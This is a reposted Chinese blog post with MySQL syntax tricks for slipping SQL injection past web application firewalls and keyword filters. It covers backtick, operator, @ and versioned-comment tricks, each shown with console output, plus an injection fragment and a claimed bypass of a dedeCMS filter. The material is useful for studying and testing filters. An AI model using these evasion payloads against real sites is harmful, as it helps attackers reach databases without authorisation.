博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
waf 绕过的技巧
阅读量:6703 次
发布时间:2019-06-25

本文共 1438 字,大约阅读时间需要 4 分钟。

livers · 2013/05/31 17:41

研究过国内外的waf。分享一些 奇淫绝技。

一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。

Mysql

tips1: 神奇的 `  (格式输出表的那个控制符)

过空格和一些正则。

mysql> select`version`()     -> ;  +----------------------+  | `version`()          |  +----------------------+  | 5.1.50-community-log |  +----------------------+  1 row in set (0.00 sec)复制代码

一个更好玩的技巧,这个`控制符可以当注释符用(限定条件)。

mysql> select id from qs_admins where id=1;`dfff and comment it; +----+  | id |  +----+  | 1  |  +----+  1 row in set (0.00 sec)复制代码

usage : where  id ='0'`'xxxxcomment on.

tips2:神奇的- + .

mysql> select id from qs_admins;  +----+  | id | +----+  | 1  |  +----+  1 row in set (0.00 sec)mysql> select+id-1+1.from qs_admins;  +----------+  | +id-1+1. |  +----------+  | 1        |  +----------+  1 row in set (0.00 sec)mysql> select-id-1+3.from qs_admins;  +----------+  | -id-1+3. |  +----------+  | 1        |  +----------+  1 row in set (0.00 sec)复制代码

(有些人不是一直在说关键字怎么过?过滤一个from ...    就是这样连起来过)

tips3: @

mysql> select@^1.from qs_admins;  +------|+  | @^1. |  +------|+  | NULL |  +------|+复制代码

这个是bypass  曾经dedeCMS filter .

或者这样也是ok.

tips4:mysql function() as xxx  也可以不用as 和空格

mysql> select-count(id)test from qs_admins;  +------|+  | test |  +------|+  | -1   |  +------|+  1 row in set (0.00 sec)复制代码

tips5:/*![>5000]*/ 新构造  版本号(这个可能有些过时了。)

mysql> /\*!40000select\*/ id from qs_admins;  +----+  | id |  +----+  |  1 |  +----+  1 row in set (0.00 sec)复制代码

先分享这么多,哈。

转载地址:http://jyblo.baihongyu.com/

你可能感兴趣的文章
三本101 hacks书籍
查看>>
百度竞价如何过滤无效点击
查看>>
mysql 主从同步,故障处理
查看>>
解决xcode升级后插件无法使用的问题
查看>>
ASP.NET中,“没有为该对象定义无参数的构造函数”的错误
查看>>
zabbix监控服务器安装
查看>>
备份和归档的区别
查看>>
Lock的使用
查看>>
我回来了!
查看>>
我的友情链接
查看>>
JAVA基础之分布式对象
查看>>
MySQL数据库的优化(一)
查看>>
我的友情链接
查看>>
IP地址规划
查看>>
SPI方式读取外部FLASH抓取时序图
查看>>
《马哥出品高薪linux运维教程》wingkeung学习笔记-linux基础入门课程6
查看>>
我的友情链接
查看>>
按钮相互切换
查看>>
【c语言】 模拟实现printf,要求功能: my_printf("dc\ts\ndc\ndc\ts!", ...)
查看>>
iOS开发:View的属性 hidden、alpha、opaque
查看>>